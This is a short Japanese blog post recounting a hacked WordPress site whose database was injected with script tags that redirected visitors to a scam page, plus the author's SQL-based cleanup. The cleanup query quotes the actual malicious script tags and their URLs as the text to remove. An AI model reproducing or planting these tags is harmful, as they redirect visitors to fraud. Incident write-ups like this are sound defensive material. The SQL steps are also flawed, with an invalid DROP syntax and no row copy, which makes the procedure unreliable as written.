問題

(Apache2 + (mod_php) + mysql)

本サイトにアクセスすると、詐欺ページにリダイレクトされるようになっていた。 ↓この画面がリダイレクトされて出てきました。 wordpressを再インストールするも、治らない。

DBを調べてみると、至る所に<script src= 知らないurl></script>が入っていた。

DBのいじられた箇所

• 全記事
• 新しく勝手に作成された記事
• 画像クリックした時に出るページにも(画像参照)

• wordpressの管理者ユーザーに見知らぬ名前が追加されている

発見前に最新版にアップデートしたと記憶しており、ゼロデイ攻撃にあったのだと思われる。

対応

1. ファイルのバックアップを取る
2. 新しくDBを作り、記事をコピー

wordpressを再インストールし、新しくDBを作成する(ここではdb2)

CREATE DATABASE db2;

1. 新しくwordpressをインストールし、wordpress用のDBとしてdb2を選択する

2. もとから入っている記事を削除

   DROP db2.wp_posts;
   

3. 記事を修正

   DROP db2.wp_posts;
   CREATE table db2.wp_posts LIKE db1.wp_posts;
   

   記事に勝手に埋め込まれたURL等を一括で置換して削除する

   UPDATE db2.wp_posts SET post_content = REPLACE(post_content, '<script src=知らないURL></script>','');
   

   自分の場合は↓のSQLを実行した

   UPDATE db2.wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043\' type=\'text/javascript\'></script><script src=\'https://clicks.worldctraffic.com/clizkes\' type=\'text/javascript\'></script>','');
   

4. アップロードした画像や動画をコピー

   アップロードした画像や動画は wp-content/uploadsに入っている

   cp -rf バックアップ/wp-content/uploads/* wp-content/
   

感想

記事を全置換されなかっただけ、まだよかった。 Wordpressはもう使わないと思う。 結局サイトをGatsby + Contentful + Netlify に変えました。